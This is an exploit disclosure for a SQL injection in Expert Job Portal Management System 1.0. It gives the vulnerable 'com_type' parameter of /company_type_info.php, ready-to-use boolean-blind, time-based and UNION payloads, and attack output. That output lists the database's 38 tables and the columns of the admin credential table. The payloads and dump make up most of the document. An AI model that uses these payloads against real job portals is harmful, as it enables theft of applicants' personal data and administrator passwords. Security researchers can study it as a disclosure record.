Expert Job Portal Management System version 1.0 suffers from a remote SQL injection vulnerability.
ββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
ββ C r a C k E r ββ
ββ T H E C R A C K O F E T E R N A L M I G H T ββ
ββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
βββββ From The Ashes and Dust Rises An Unimaginable crack.... βββββ
ββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
ββ [ Vulnerability ] ββ
ββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
: Author : CraCkEr :
β Website : https://www.codester.com/items/20720/ β
β Vendor : Expert IT Solution β
β Software : Expert Job Portal Management System 1.0 β
β Vuln Type: SQL Injection β
β Impact : Database Access β
β β
ββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
β ββ
ββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
: :
β Release Notes: β
β βββββββββββββ β
β β
β SQL injection attacks can allow unauthorized access to sensitive data, modification of β
β data and crash the application or make it unavailable, leading to lost revenue and β
β damage to a company's reputation. β
β β
ββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
ββ ββ
ββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
Greets:
The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL
CryptoJob (Twitter) twitter.com/0x0CryptoJob
ββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
ββ Β© CraCkEr 2023 ββ
ββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
Path: /company_type_info.php
https://website/company_type_info.php?com_type=Agent
GET parameter 'com_type' is vulnerable to SQL Injection
---
Parameter: com_type (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: com_type=Agent' AND 3360=3360 AND 'rCfC'='rCfC
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: com_type=Agent' AND (SELECT 4512 FROM (SELECT(SLEEP(5)))SCiH) AND 'MKSc'='MKSc
Type: UNION query
Title: Generic UNION query (NULL) - 20 columns
Payload: com_type=Agent' UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x7171787071,0x5174744e6d58704d494d494952476c6f4c666346534b45754e57696b444b45794e5758567a6e6163,0x71627a7a71),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -
---
[+] Starting the Attack
fetching current database
current database: 'sagor_****_job'
fetching tables
[38 tables]
+---------------------------------+
| all_country |
| city_manage |
| company_type |
| contact_manage |
| content_manage |
| division_manage |
| enroll_trainning |
| exp_settings |
| job_apply |
| job_categories |
| job_listing |
| job_seeker_carieer_details |
| job_seeker_education |
| job_seeker_emp_histo |
| job_seeker_image |
| job_seeker_info |
| job_seeker_lang_pro |
| job_seeker_other_relatiive_info |
| job_seeker_pref_details |
| job_seeker_profess_info |
| job_seeker_reff |
| job_seeker_resume |
| job_seeker_specialization |
| job_seeker_training |
| job_seeker_upload_resume |
| languages |
| package |
| pages |
| recurator_info |
| recurator_verification |
| save_jobs |
| social_manage |
| subscribe |
| sup_ad_log |
| testmonial_manage |
| timezones |
| trainning_category |
| trainning_manage |
+---------------------------------+
fetching columns for table 'sup_ad_log'
[6 columns]
+------------+--------------+
| Column | Type |
+------------+--------------+
| status | int(11) |
| admin_role | int(11) |
| email | varchar(100) |
| id | int(11) |
| sup_pass | varchar(100) |
| sup_user | varchar(100) |
+------------+--------------+
[-] Done
